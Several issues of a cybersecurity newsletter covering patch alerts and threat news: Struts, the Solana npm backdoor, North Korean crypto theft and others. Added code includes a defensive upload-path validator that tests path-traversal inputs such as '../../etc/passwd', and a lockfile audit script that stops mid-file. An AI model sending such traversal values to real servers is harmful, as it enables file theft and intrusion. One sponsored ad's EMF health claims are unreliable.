  • Type: Post-auth Code Injection

  • Impact: Authenticated users can execute RCE via the User Portal.

Patched Versions:

Hotfixes are available for affected versions (21.0 GA and earlier), including v21 MR1+, v20 GA, v19.5 MR3+, and others.

📋 Verifying Hotfix Installation:

  • CVE-2024-12727: run cat /conf/nest_hotfix_status (hotfix applied if the value is 320 or higher).

  • CVE-2024-12728/12729: run system diagnostic show version-info (hotfix applied if the value is HF120424.1 or later).

🔑 Mitigation Recommendations:

  • Restrict SSH access to dedicated HA links or disable WAN SSH access.

  • Use a long, random passphrase for HA setup.

  • Ensure User Portal and Webadmin are inaccessible from WAN.

⚠️ Background:

This comes shortly after U.S. authorities charged a Chinese national for exploiting a previous Sophos zero-day (CVE-2020-12271, CVSS 9.8) that compromised 81,000 firewalls globally.

🌐 Act Now:

Apply hotfixes or implement workarounds to safeguard your systems from potential threats! 🚀✨

Now, on to this week’s hottest cybersecurity news stories: 

  • 🐪 Iran's Charming Kitten deploys variant of BellaCiao malware 👾

  • 👨🏽‍💻 N. Korean hackers ‘Madoff’ with $308M of Bitcoin from DMM 💱

  • 🤖 OpenAI fined €15M by Italy for ChatGPT’s GDPR data violations 💸

BellaMiaow 🐱

🚨 Charming Kitten’s New Trick! 🐱✨

The Iranian hacking group Charming Kitten is back, rolling out a C++ variant of its sneaky malware, BellaCiao, now called BellaCPP! 💻🦠

🔍 What Did Kaspersky Find?

During a recent investigation in Asia, Kaspersky discovered BellaCPP on a machine that was also infected with BellaCiao. This malware family has a track record of targeting the U.S., the Middle East, and India—a global cyber troublemaker! 🌍⚠️

💡 What’s Different About BellaCPP?

While BellaCiao relied on a web shell for uploading files, running commands, and maintaining persistence, BellaCPP skips the web shell but keeps its danger:

  • SSH Tunnels: Uses a mysterious DLL file to create covert communication tunnels.

  • Stealthy Payloads: Designed to load and execute additional malware.

  • Attribution: Still linked to domains and patterns previously tied to Charming Kitten.

👀 Who Are They?

Charming Kitten (a.k.a. APT35, Mint Sandstorm, TA453, and more!) is associated with Iran’s IRGC and loves using:

  • Social engineering tricks to lure victims.

  • Exploits in widely used software like Microsoft Exchange Server and Zoho ManageEngine.

🛡️ How to Stay Safe?

  • Patch your systems regularly! 🚨

  • Monitor for unusual network traffic or SSH activity.

  • Be cautious of phishing attempts—they're pros at it! 🎯

🐾 These kittens might sound cute, but their claws are sharp. Don’t let them pounce! 🛡️✨


Korea criminals nab a Bit of Coin 💀

🚨 Crypto Heist Alert: $308M Stolen by North Korean Hackers! 💰

Japanese and U.S. authorities have officially linked the May 2024 theft of $308 million in cryptocurrency from DMM Bitcoin to North Korean cyber actors! 😱💻

🕵️‍♀️ Who’s Behind It?

The culprits are part of TraderTraitor (a.k.a. Jade Sleet, UNC4899, Slow Pisces), a notorious North Korea-linked group that specializes in:

  • Social engineering: Targeting multiple employees of a company at once.

  • Malware-laced apps: Often disguised as cryptocurrency tools.

  • Sophisticated scams: Even posing as recruiters or collaborators on GitHub projects.

🧑‍💻 How Did They Do It?

🎯 Targeting Employees:

In March 2024, an employee of Ginco (a crypto wallet company in Japan) was tricked by a fake recruiter into running a malicious Python script.

🌐 Compromising Systems:

Using session cookies, the attackers gained access to Ginco’s communication systems.

💳 Exploiting Transactions:

In May, they manipulated a legitimate DMM Bitcoin transaction, stealing 4,502.9 BTC!

🌐 What Happened Next?

The stolen funds were moved to TraderTraitor-controlled wallets.

To cover their tracks, they used tools like:

  • Bitcoin CoinJoin Mixing Service 🌀 for anonymity.

  • Bridging services to shuffle the money further.

Ultimately, funds reached HuiOne Guarantee, a company tied to cybercrime activities.

🛡️ Stay Safe!

💡 Tips to avoid being a target:

  • Be cautious of recruiters or unsolicited messages.

  • Double-check URLs before opening or downloading anything.

  • Regularly update your security measures and monitor for unusual activity.

👀 What’s Next?

This revelation follows other North Korean cyber activity, including:

  • Lazarus Group’s SmallTiger backdoor targeting South Korean companies.

  • Ongoing attacks on the Web3 sector.

💣 These hackers are relentless—don’t let them outsmart you! 🛡️💻

It was an Open(AI) and shut case 😏

🚨 ChatGPT Fined €15M in Italy Over Data Privacy Concerns 💸

Italy’s data protection watchdog, Garante, has slapped OpenAI with a €15 million fine (~$15.66M) for mishandling personal data used to train ChatGPT.

🤷‍♂️ What’s the Issue?

OpenAI allegedly violated GDPR by:

  • Processing user data without proper legal justification.

  • Failing to notify authorities of a March 2023 data breach.

  • Not implementing age verification, exposing kids under 13 to potentially inappropriate content.

👉 What’s Next?

OpenAI must run a six-month public campaign to explain:

  • How ChatGPT collects and uses data.

  • Users’ rights to object, rectify, or delete their data.

🤖 OpenAI Responds

  • Called the decision disproportionate, noting the fine is 20x its Italian revenue.

  • Plans to appeal while staying committed to balancing AI innovation and privacy.

This marks another chapter in the global conversation around AI accountability—a sign of the times for tech and privacy regulation! 🚦💻


🚨 Ukraine CERT Warns of Malware Targeting Military via Fake Army+ App 📱



Welcome to Gone Phishing, your weekly cybersecurity newsletter that feels Fury towards cybercrime. Doesn’t it just make Usyk? 🤣 #FuryvsUsyk2 🥊🥊🥊

Patch of the Week! 🩹


Congrats to Apache, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

A patch for Apache 👍🏻

🚨 Critical Apache Struts Vulnerability Under Attack! 🚁

A newly disclosed security flaw in Apache Struts (CVE-2024-53677, CVSS 9.5) is being actively exploited by threat actors to enable Remote Code Execution (RCE).

🔍 What’s the Risk?

  • Attackers exploit file upload parameters to perform path traversal, enabling malicious file uploads.

  • This can lead to executing arbitrary commands, stealing sensitive data, or deploying additional malware.

🎯 Impacted Versions:

  • Struts 2.0.0 – Struts 2.3.37 (End-of-Life)

  • Struts 2.5.0 – Struts 2.5.33

  • Struts 6.0.0 – Struts 6.3.0.2

Patched in:

Struts 6.4.0 or newer

🛡️ Mitigation Steps: 

1. Update Apache Struts to version 6.4.0+ immediately.

2. Reconfigure your applications to use the new Action File Upload mechanism and related interceptor for added security.
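Upgrading is the fix; the reason the new upload mechanism matters is that the client-supplied file name must never decide where a file lands. The snippet below is an added illustration in Python of that bug class (it is not Apache Struts code and does not reproduce the Struts exploit): the trusting path join beside a hardened version that keeps only a sanitised base name, whitelists the extension, and proves the resolved path is still inside the upload root. The upload directory and extension list are assumptions, and nothing is written to disk.

```python
"""Unsafe vs safe handling of a client-supplied upload file name.

Added illustration of the path-traversal-through-upload bug class; not Apache
Struts code. UPLOAD_ROOT and ALLOWED_EXT are assumptions, and the functions
only compute paths; they never write files.
"""
from pathlib import Path, PurePosixPath
import re

UPLOAD_ROOT = Path("/srv/app/uploads")        # assumption: the intended upload directory
ALLOWED_EXT = {".pdf", ".png", ".jpg", ".txt"}  # assumption: what this app accepts

def target_path_unsafe(client_name):
    """Vulnerable pattern: the client's file name decides the destination path."""
    return UPLOAD_ROOT / client_name

class RejectedUpload(ValueError):
    """Raised when a file name fails validation."""

def target_path_safe(client_name):
    """Hardened pattern: sanitised base name, extension whitelist, containment check."""
    # 1. Drop any directory components the client sent, in either separator style.
    base = PurePosixPath(client_name.replace("\\", "/")).name
    # 2. Whitelist the characters instead of blacklisting '..' and friends.
    if not re.fullmatch(r"[A-Za-z0-9][A-Za-z0-9._-]{0,99}", base):
        raise RejectedUpload(f"unacceptable file name: {client_name!r}")
    if Path(base).suffix.lower() not in ALLOWED_EXT:
        raise RejectedUpload(f"extension not allowed: {base!r}")
    # 3. Resolve and verify the result is still underneath the upload root.
    candidate = (UPLOAD_ROOT / base).resolve()
    if UPLOAD_ROOT.resolve() not in candidate.parents:
        raise RejectedUpload("path escapes upload root")
    return candidate

def escapes_root(path):
    """True if a path, once resolved, lands outside UPLOAD_ROOT."""
    return UPLOAD_ROOT.resolve() not in Path(path).resolve().parents

def is_acceptable(client_name):
    """Convenience wrapper: does the hardened check accept this name?"""
    try:
        target_path_safe(client_name)
        return True
    except RejectedUpload:
        return False

if __name__ == "__main__":
    for name in ("report.pdf", "../../etc/passwd", "..\\..\\app\\shell.jsp", "photo.JPG"):
        unsafe = target_path_unsafe(name)
        print(f"{name!r:28} unsafe -> {unsafe} (escapes: {escapes_root(unsafe)})"
              f"  safe -> {'accepted' if is_acceptable(name) else 'rejected'}")
```

Step 3 is the belt to steps 1 and 2's braces: even if a future change loosens the name check, a path that resolves outside the root is still refused.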

💡 Why It Matters:

Apache Struts powers mission-critical business workflows, public-facing portals, and internal productivity apps. A flaw like this could lead to severe business disruption and data breaches if left unpatched. 

⚡ Current Threat Activity:

  • Exploitation attempts matching a public proof-of-concept (PoC) are underway.

  • Attackers are scanning for vulnerable systems and deploying malicious scripts.

🌐 Protect Your Systems Now!

Patch immediately to stay ahead of this rapidly evolving threat. Stay secure! 🔒

Now, on to this week’s hottest cybersecurity news stories: 

  • 📱 Army+ MoD app spoofed by hackers to deceive military personnel 👨🏻‍✈️

  • 👮 Interpol calls time on victim-blaming ‘pig-butchering’ term. Woke! 😉 

  • 💸 No Meta what they fine us. No Meta what we do… Meta fined €251 😳

What’s your major malfunction?! 👾

🚨 Ukraine CERT Warns of Malware Targeting Military via Fake Army+ App 📱

The Computer Emergency Response Team of Ukraine (CERT-UA) has uncovered a new campaign by UAC-0125, a threat actor exploiting the Cloudflare Workers service to distribute malware disguised as the legitimate Army+ app, used by the Ministry of Defence to digitize operations.

🛡️ How the Attack Works

1. Fake Websites: Cloudflare Workers-hosted sites trick users into downloading a malicious Windows installer for Army+.

2. Malicious Payload: The installer, created with NSIS (Nullsoft Scriptable Install System), runs a decoy file while executing a PowerShell script to:

  • Install OpenSSH.

  • Generate RSA cryptographic keys.

  • Upload the private key to an attacker-controlled server via TOR.

3. Goal: The attackers aim to achieve remote access to compromised systems.

🎯 Threat Actor Ties

CERT-UA linked UAC-0125 to UAC-0002, also known as APT44, Sandworm, or Voodoo Bear — a group associated with Russia’s GRU Unit 74455, known for cyber-espionage and sabotage campaigns.

📈 Broader Context of Cloudflare Abuse

Phishing Surge: Reports by Fortra show a dramatic rise in abuse of Cloudflare services for phishing:

  • Cloudflare Pages: A 198% increase in attacks from 2023 to mid-2024.

  • Cloudflare Workers: A 104% rise over the same period.

  • Target: Hosting fake Microsoft 365 login and verification pages to steal credentials.

🌍 European Sanctions Against Russian Cyber Operations

The European Council has imposed sanctions targeting individuals and entities involved in Russia’s destabilizing activities:

  • GRU Unit 29155: Linked to assassinations, bombings, and cyberattacks in Europe.

  • Doppelganger Network: Disseminates pro-Russian disinformation to erode Western support for Ukraine.

  • High-ranking individuals, such as Sofia Zakharova and Nikolai Tupikin, face asset freezes and travel bans for their roles in malign influence campaigns.

🔍 What This Means

The campaign underscores how threat actors exploit legitimate platforms to mask malicious activities. It also highlights the increasing weaponization of disinformation and cyber tools in geopolitical conflicts.

💡 Stay Protected: Ensure all apps are downloaded from official sources, and monitor for unusual activity on devices! 🌐

Learn AI in 5 Minutes a Day

AI Tool Report is one of the fastest-growing and most respected newsletters in the world, with over 550,000 readers from companies like OpenAI, Nvidia, Meta, Microsoft, and more.

Our research team spends hundreds of hours a week summarizing the latest news, and finding you the best opportunities to save time and earn more using AI.

Sign up with 1-Click

Honeypot, kettle, hack 🙃

🚨 INTERPOL Pushes for 'Romance Baiting' as New Term for Crypto Scams 🌐

INTERPOL is advocating for the term "romance baiting" to replace "pig butchering" in describing scams where victims are manipulated into fake cryptocurrency investments under the guise of romantic relationships.

💔 Why the Shift?

The term "pig butchering" shames and dehumanizes victims, discouraging them from seeking help.

"Romance baiting" highlights the scammers' tactics and shifts focus to their criminal actions.

📜 Background

Originating in China (2016), the scam is based on the term "杀猪盘" ("shā zhū pán"), meaning "pig butchering."

Scammers build trust over time, often via social media or dating apps, before stealing victims' funds through fake investments.

🌍 A Broader Problem

These schemes are linked to organized crime groups in Southeast Asia.

Victims aren’t limited to financial loss; some scammers are forced into these operations under trafficked labor conditions.

🛠️ Sophisticated Tactics

Fraudsters use convincing apps and websites built by tech teams to mimic real trading platforms.

Google has also taken action, suing app developers involved in these schemes.

🗣️ Words Matter

INTERPOL emphasizes the importance of respectful language, similar to evolving terms for domestic violence and child exploitation.

  • "Romance baiting" focuses on empathy for victims and accountability for scammers.

  • "It’s time to prioritize respect and hold fraudsters accountable," said Cyril Gout, Acting Executive Director of Police Services.

💡 Key Takeaway 

Shifting language can reduce stigma, encourage reporting, and focus on stopping scammers. Always verify investments and be cautious of unsolicited online relationships! 💻❤️

They finally Meta their match 😏

🚨 Meta Fined €251M for 2018 Data Breach Impacting Millions 💸

Meta Platforms, the parent company of Facebook, has been fined €251 million ($263 million) by the Irish Data Protection Commission (DPC) for a 2018 breach that affected 29 million accounts globally, including 3 million in the EU and EEA.

🛡️ What Happened?

  • The breach, disclosed in September 2018, stemmed from a "View As" feature bug introduced in July 2017.

  • Attackers exploited the feature to obtain access tokens, gaining unauthorized entry to accounts and exposing personal data like names, emails, phone numbers, and posts.

📜 GDPR Violations

The DPC cited Meta for failing to:

  1. Include necessary details in its breach notification.

  2. Properly document and remedy the breach.

  3. Protect data in system design.

  4. Limit data processing to specific purposes.

💡 Key Takeaways

  • The DPC emphasized the importance of data protection in system design to prevent harm.

  • This marks Meta's second penalty from the DPC, following a €91M fine in September 2024 for another security lapse.

🌍 Broader Implications

Meta is also addressing privacy concerns globally, agreeing to an AU$50M settlement in Australia for misuse of personal data tied to the 2018 Cambridge Analytica scandal.

These cases underline the increasing accountability tech giants face for privacy violations under GDPR and other global frameworks.

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!


🚨 Global DDoS Takedown: PowerOFF Operation Wreaks Havoc on cybercrime! 🌍


Welcome to Gone Phishing, your daily cybersecurity newsletter that treats cybercriminals like the government treats farmers 😬😬😬 

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to WordPress’s Hunk plugin, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

What a Hunk of junk 😉 JK!

🚨 Critical WordPress Security Alert: Hunk Companion Plugin Vulnerability 🔌

A critical flaw in the Hunk Companion plugin (CVE-2024-11972, CVSS 9.8) is being actively exploited by attackers to install vulnerable plugins, paving the way for devastating attacks like Remote Code Execution (RCE), SQL Injection, and Cross-Site Scripting (XSS). 

🔑 What’s Happening?

  • Attackers are exploiting this flaw to install plugins like the now-closed WP Query Console, which has its own unpatched RCE vulnerability (CVE-2024-50498, CVSS 10.0).

  • This creates backdoors, manipulates databases, and allows the execution of malicious PHP code.

🛠️ Impacted Versions:

  • Hunk Companion: All versions before 1.9.0.

  • The flaw bypasses a previous patch (CVE-2024-9707, CVSS 9.8).

Fixed in:

Version 1.9.0

⚡ Action Required:

Update Hunk Companion immediately to version 1.9.0 or later to close this vulnerability.

Review and remove any suspicious plugins or scripts on your site.

🔒 Why It’s Critical:

Exploiting outdated or abandoned plugins is a key tactic for attackers, turning weak points into opportunities for total site compromise.

Stay secure, and keep your WordPress site up to date! 🌐✨

Now, on to this week’s hottest cybersecurity news stories: 

  • 👮 Europol FTW! Smashes 27 DDoS platforms across 15 nations 🌍

  • 👾 Amadey is a weapon of MaaS disruption being deployed in Ukraine ☣️

  • 🖥️ Windows users beware! New malware could exploit Windows UI ⚠️

Europol: Can we crack it? DDoS we can! 🎶

🚨 Global DDoS Takedown: PowerOFF Operation Wreaks Havoc on cybercrime! 🌍

A massive international law enforcement operation called PowerOFF has struck a blow against DDoS-for-hire services! Authorities in 15 countries joined forces to dismantle 27 booter and stresser platforms like zdstresser.net, orbitalstress.net, and starkstresser.net.

🎯 Key Highlights:

💻 Services Down: These platforms, used for launching DDoS attacks, are offline!

🕵️ Arrests: Three alleged administrators were nabbed in France and Germany, and over 300 users are now on law enforcement radars.

🌐 Countries United: Australia, Brazil, Canada, Japan, and others participated in the takedown.

🔎 What Are Stresser Sites?

These shady platforms allowed hackers and hacktivists to flood websites with traffic, making them inaccessible. 

Customers could launch attacks for:

💰 Money

🎭 Hacktivism (think KillNet or Anonymous Sudan)

🕵️‍♂️ Sabotage 

🚨 A Wake-Up Call for Businesses:

🛡️ With the takedown of these services, law enforcement is sending a clear message:

💔 Don’t rely on illegal stresser services—they might just lead back to you.

🔒 Strengthen your defenses against DDoS attacks.

🚀 Keep your security updated to counter emerging threats like Breaking WAF, a bug that bypasses web application firewalls.

🌐 The Bigger Picture:

This takedown comes amidst a surge in DDoS attacks, especially during high-traffic periods like Black Friday. According to Cloudflare, the most targeted industries in 2024 included Gambling, Finance, and Telecom.

🎉👏 A Victory for Cybersecurity! 

The success of Operation PowerOFF shows that when nations unite 🌏, they can dismantle even the most complex cybercrime networks. For now, the internet breathes a little easier.

🚦Stay vigilant and stay secure! 💪✨

Start learning AI in 2025

Everyone talks about AI, but no one has the time to learn it. So, we found the easiest way to learn AI in as little time as possible: The Rundown AI.

It's a free AI newsletter that keeps you up-to-date on the latest AI news, and teaches you how to apply it in just 5 minutes a day.

Plus, complete the quiz after signing up and they’ll recommend the best AI tools, guides, and courses – tailored to your needs.

Sign up to start learning.

Amadeyzzz bruv 💀

🚨 Russian Cyber Espionage Alert: Secret Blizzard's Deceptive Tactics in Ukraine! 🎯

🕵️‍♂️ The Russian nation-state actor Secret Blizzard (aka Turla) is back in the spotlight, leveraging tools from other hacking groups to deploy the Kazuar backdoor against Ukrainian targets. Microsoft's latest report unveils a sophisticated and deceptive operation aimed at espionage and intelligence collection.

💡 Key Insights:

Hijacked Tools: Secret Blizzard used the Amadey bot malware to infiltrate Ukrainian military systems between March and April 2024.

🧩 Layered Attacks: Amadey was employed to download the Tavdig backdoor, which then installed an updated Kazuar variant.

🐾 Shadowy Operations: This marks the second instance since 2022 where Secret Blizzard leveraged another group's campaign to mask its tracks.

🔍 A Tactical Playbook of Deception

Secret Blizzard is known for covert and long-term intelligence gathering targeting:

🌍 Government offices, embassies, and ministries of foreign affairs.

🛡️ Defense departments and military-linked organizations.

Their methods include:

🌐 Watering Hole Attacks (compromising websites to target visitors).

📧 Spear-Phishing campaigns.

🕶️ Adversary-in-the-Middle (AitM) attacks. 

🚨 The Role of Amadey Malware-as-a-Service (MaaS):

  • Access Techniques: Secret Blizzard may have stealthily accessed Amadey C2 panels or purchased access through the dark web.

  • Customized Payloads: A PowerShell dropper delivered encoded malware, contacting a Turla-controlled C2 server for further exploitation. 

🛡️ Why This Matters:

Secret Blizzard’s strategy of commandeering tools from other actors—like Flying Yeti's COOKBOX backdoor—obscures its tracks and complicates attribution.

💻 Their adaptability in using shared or hijacked infrastructures frustrates threat analysts and enables stealthier campaigns.

🌍 Global Cybersecurity Implications

Evolving Espionage: The use of third-party access is a rare but increasingly effective obfuscation tactic. 

🛡️ Resilience Required: Organizations need robust defenses, including endpoint monitoring and real-time threat intelligence, to detect sophisticated multi-layered attacks. 

🔒 Final Thought:

Secret Blizzard’s operations reveal the lengths nation-state actors will go to remain undetected while achieving their goals. 🌐 Stay vigilant, adopt proactive security measures, and watch for evolving tactics in the cyber threat landscape! 💪✨

Discover the Secret Behind Elite Athletes Seeking Peak Performance: The Advanced Tech Supporting Their Mental Clarity and Recovery

Elite performers demand peak performance from their bodies, and optimizing health is essential for achieving that edge. Our cutting-edge EMF protection technology is designed to help athletes shield themselves from the harmful effects of electromagnetic radiation, which can lead to fatigue, decreased recovery time, and impaired focus. By using Aires Tech products, athletes can minimize exposure to EMF from the devices they rely on daily—whether it's training gear, wearable tech, or even smartphones—allowing them to focus on maximizing their physical and mental capabilities. An official partner of UFC, WWE and Canada Basketball, Aires is committed to protecting and optimizing elite athletes through innovation and performance excellence.

Learn More

Hackers see a Window of opportunity 👨🏻‍💻 

🚨 Windows UI Automation: A Stealthy New Cyber Threat ⚡

💻 Cybersecurity researchers have uncovered a method to exploit the Windows UI Automation (UIA) framework for malicious purposes while bypassing endpoint detection and response (EDR) systems.

🔑 Key Takeaways

  • What It Does: Malicious programs can use UIA to:

      • Execute stealthy commands.

      • Harvest sensitive data (e.g., payment info).

      • Manipulate messaging apps like Slack or WhatsApp.

      • Redirect browsers to phishing sites.

  • Attack Scope: Local attackers can exploit UIA to control or interact with apps remotely by leveraging Component Object Model (COM) mechanisms.

🧩 How It Works

UIA, designed for assistive tech and automated testing, interacts with UI elements at high privilege levels when granted administrator permissions. These interactions can be exploited to read/write data or execute commands silently.

⚠️ Why It’s Dangerous

Defender Blindspot: Windows sees these malicious actions as intended features, not threats, allowing them to bypass defenses.

Hidden Interactions: Attackers can interact with UI elements not visible on the screen, enabling covert data theft or command execution.

🔐 DCOM: Another Threat Vector

In parallel, researchers at Deep Instinct uncovered a method to abuse the Distributed COM (DCOM) protocol for lateral movement: 

  • Custom Payloads: Attackers can write DLLs, create backdoors, and execute arbitrary code.

  • Detectable, but constrained: These attacks leave indicators of compromise (IoCs), and they require the attacker and victim to be in the same domain.

🛡️ Stay Protected 

Organizations should:

  • Monitor for unusual COM/DCOM activity.

  • Restrict admin-level privileges where possible.

  • Strengthen defenses against UI and accessibility abuse.

🌐 Takeaway: These findings underscore the creative exploitation of legitimate tools for malicious purposes. Vigilance and proactive security measures are essential! 🚀


Let us know what you think.

So long and thanks for reading all the phish!


Russian Money Laundering Networks Busted in International Crackdown


Welcome to Gone Phishing, your daily cybersecurity newsletter that can protect you from the cyberstorm, but not Storm Darragh. UK readers beware! 🌪️⛈️🚨 #RedWarning

Patch of the Week! 🩹

First thing’s first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the week. Okay, that’s it… 😳 

Congrats to Veeam, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

🚨 Critical Security Alert for Veeam Users! 🙍🏻‍♂️

Veeam has patched a critical flaw (CVE-2024-42448, CVSS 9.9) in its Service Provider Console (VSPC) that could enable remote code execution (RCE) on vulnerable instances 💥.

🔑 Key Details:

Exploitation requires an authorized management agent on the server.

A second flaw (CVE-2024-42449, CVSS 7.1) could leak NTLM hashes and delete files ⚠️.

🛠️ Impacted Versions:

VSPC 8.1.0.21377 and all earlier versions of builds 7 and 8.

✅ Fixed in:

Version 8.1.0.21999

⚡ Action Required:

There are no mitigations. Update immediately to protect against potential exploits, especially as Veeam products are often targeted by ransomware operators 🔐. 

Stay safe and secure your systems today! 🌐✨

Now, on to this week’s hottest cybersecurity news stories: 

  • 👮🏻‍♂️ UK crypto squad arrests 84, seizes $20M in Operation Destabilise 💥

  • 🏰 Europol takes down the MATRIX invite-only criminal messaging service 👩🏻‍💻

  • 🚪 Backdoor discovered in Solana’s popular Web3.js npm library 📚


Destabilise to the Moon 🚀📈😂

🚨 Russian Money Laundering Networks Busted in International Crackdown 🌍

The U.K. National Crime Agency (NCA) has led a massive global investigation, Operation Destabilise, targeting Russian money laundering networks linked to organized crime across the U.K., the Middle East, Russia, and South America.

🏆 Major Wins:

🕵️ 84 arrests connected to the Smart Group and TGR Group, two Russian-speaking money laundering networks.

💰 Seized £20 million ($25.4M) in cash and cryptocurrency.

💡 How They Operated:

🏢 Based in Moscow's Federation Tower, a known hub for money laundering.

💳 Provided illicit financial services, including:

  • Laundering funds for sanctioned Russian elites.

  • Converting cash to cryptocurrency and vice versa.

  • Facilitating the purchase of property in the U.K. for Russian elites.

🗽 U.S. Treasury Steps In:

The U.S. Treasury's OFAC sanctioned five individuals and four entities tied to the TGR Group.

🛑 TGR’s Role: Helping Russian elites evade sanctions using cryptocurrency and stablecoins to funnel wealth back to the Kremlin.

🔥 Key Player: Ekaterina Zhdanova

  • Head of the Smart Group.

  • Previously sanctioned for laundering $2.3 million in proceeds for the Ryuk ransomware group.

  • Allegedly supported Russian espionage operations and cybercrime syndicates.

🌐 Broader Implications:

For the first time, investigators uncovered:

🧵 A clear link between Russian elites, crypto-funded cybercriminals, and UK street-level drug gangs.

🔐 "Smart and TGR acted as a financial bridge, enabling Russian elites to bypass sanctions and access Western economies," the NCA said.

This operation highlights the role of illicit financial networks in sustaining cybercrime, espionage, and organized crime worldwide. 🕶️


The Matrix has you… 👩🏻‍💻

Europol: hold my beer 💪

🚨 Encrypted Messaging Service MATRIX Dismantled in Europol Operation 📱

Europol has taken down MATRIX, an encrypted messaging platform built specifically for criminal activities. The operation, codenamed Passionflower, was spearheaded by French and Dutch authorities, marking a major victory against organized crime.

💀 The Takedown:

🌍 Global Reach: Over 8,000 users across the world paid $1,360–$1,700 in cryptocurrency for MATRIX-enabled devices.

📱 Authorities intercepted 2.3 million messages in 33 languages, uncovering crimes like drug trafficking, arms smuggling, and money laundering.

🎯 Key Arrests:

  • A 52-year-old Lithuanian identified as MATRIX’s owner and manager.

  • Two others apprehended in Spain, alongside seizures of €145,000 in cash, €500,000 in cryptocurrency, 970 phones, and more.

🕵️ Inside MATRIX:

🔒 Not to be confused with matrix.org (a legit, open-source app).

📱 Offered video calls, anonymous browsing, and secure transaction tracking via customized Google Pixel phones.

🌍 Ran on over 40 servers worldwide, primarily in France and Germany, which have now been seized.

🌐 The Bigger Picture:

Europol notes a shift in the encrypted crime landscape after the fall of other platforms like Sky ECC, EncroChat, and Ghost. Criminals are now resorting to less-established or custom-built tools, but the takedown proves authorities are keeping up with these evolving technologies.

🔐 Key Takeaway:

These actions show law enforcement's growing capability to disrupt criminal tech. While new, fragmented platforms are harder to track, takedowns like these send a clear message: nowhere is safe for digital criminals.

Leading the Future of Finance

  • C$152M YTD revenue.

  • Expanding global reach.

  • Zero-debt growth strategy.

Learn More

Solana palava 🙃

🚨💻 Critical Software Supply Chain Attack Hits Popular Solana Library

A malicious supply chain attack has targeted the widely used @solana/web3.js npm library, compromising developers and crypto wallets. The attack, which exploited versions 1.95.6 and 1.95.7, could steal private keys, putting funds at risk.

🔍 The Key Details:

What Happened? Hackers injected malicious code into the library, harvesting private keys to drain cryptocurrency wallets. The compromised versions were available for a short window on December 2, 2024, and have since been removed.

The Malicious Mechanism: Threat actors used a backdoor function (addToQueue) to exfiltrate private keys via Cloudflare headers to a server at sol-rpc[.]xyz (now inactive).

The attack likely stemmed from a phishing campaign that compromised a maintainer’s credentials.

Impact: Projects handling private keys directly (e.g., bots) were most affected.

Non-custodial wallets (e.g., traditional crypto wallets) were not vulnerable.

⚠️ Next Steps for Developers:

  1. Update Now: Move to version 1.95.8 or later immediately.

  2. Rotate Keys: If you suspect exposure, regenerate your private keys.

  3. Be Cautious: Avoid opening suspicious emails or links, especially from unknown sources.

📜 Broader Context:

🛠️ More Attacks on Open-Source Ecosystems

  • Fake Solana Libraries: Another package, solana-systemprogram-utils, rerouted 2% of transactions to attacker wallets, cleverly masking malicious behavior.

  • Bogus Crypto Libraries: Fake npm packages like crypto-keccak and crypto-jsonwebtoken have siphoned credentials and crypto wallet data.

🧑‍💻 How It Happened

The phishing campaign used a fake npm website clone to steal login credentials and 2FA codes from a maintainer. Hackers transferred $164,100 (674.86 SOL) to their wallet before detection.

🛡️ The Bigger Challenge

Security experts emphasize the fragility of trust in open-source ecosystems. Social engineering attacks often target just a few developers but can have significant financial and operational impacts.

🔐 Takeaway:

This attack underscores the importance of vigilance in the software development pipeline. Developers must:

  • Regularly audit dependencies.

  • Employ robust account security (e.g., hardware-based 2FA).

  • Stay informed about potential risks in the open-source community.

  • Protect your code, your keys, and your wallet. 🛡️
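A concrete way to act on "Update Now" and "Regularly audit dependencies" above is to scan a project's package-lock.json for the two backdoored @solana/web3.js releases. This is an added example written for this newsletter item, not code from the Solana project or npm; the affected and fixed version numbers come from the article, and the sample lockfiles are constructed.

```javascript
// Audit a package-lock.json for the backdoored @solana/web3.js releases.
// Added example for this newsletter item; not code from the Solana project.
// Affected releases (per the article): 1.95.6 and 1.95.7; fixed in 1.95.8+.
const PACKAGE = "@solana/web3.js";
const COMPROMISED = new Set(["1.95.6", "1.95.7"]);
const FIXED = "1.95.8";

// Compare dotted numeric versions: negative if a < b, 0 if equal, positive if a > b.
function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Collect every installed copy of PACKAGE, including nested duplicates that a
// transitive dependency may pull in. lockfileVersion 2/3 use a flat "packages"
// map keyed by install path; lockfileVersion 1 nests "dependencies" recursively.
function findInstalledVersions(lock) {
  const found = [];
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path.endsWith("node_modules/" + PACKAGE) && meta.version) {
        found.push({ path, version: meta.version });
      }
    }
    return found;
  }
  const walk = (deps, prefix) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = prefix + "node_modules/" + name;
      if (name === PACKAGE && meta.version) found.push({ path, version: meta.version });
      if (meta.dependencies) walk(meta.dependencies, path + "/");
    }
  };
  walk(lock.dependencies, "");
  return found;
}

// Classify each hit: "compromised" (backdoored build), "outdated" (below the
// fixed release, so still in need of an upgrade) or "ok".
function auditLock(lock) {
  return findInstalledVersions(lock).map(({ path, version }) => {
    let status = "ok";
    if (COMPROMISED.has(version)) status = "compromised";
    else if (compareVersions(version, FIXED) < 0) status = "outdated";
    return { path, version, status };
  });
}

// Read and audit a lockfile from disk.
function auditLockFile(file) {
  const fs = require("fs");
  return auditLock(JSON.parse(fs.readFileSync(file, "utf8")));
}

// Constructed sample lockfiles standing in for real project files.
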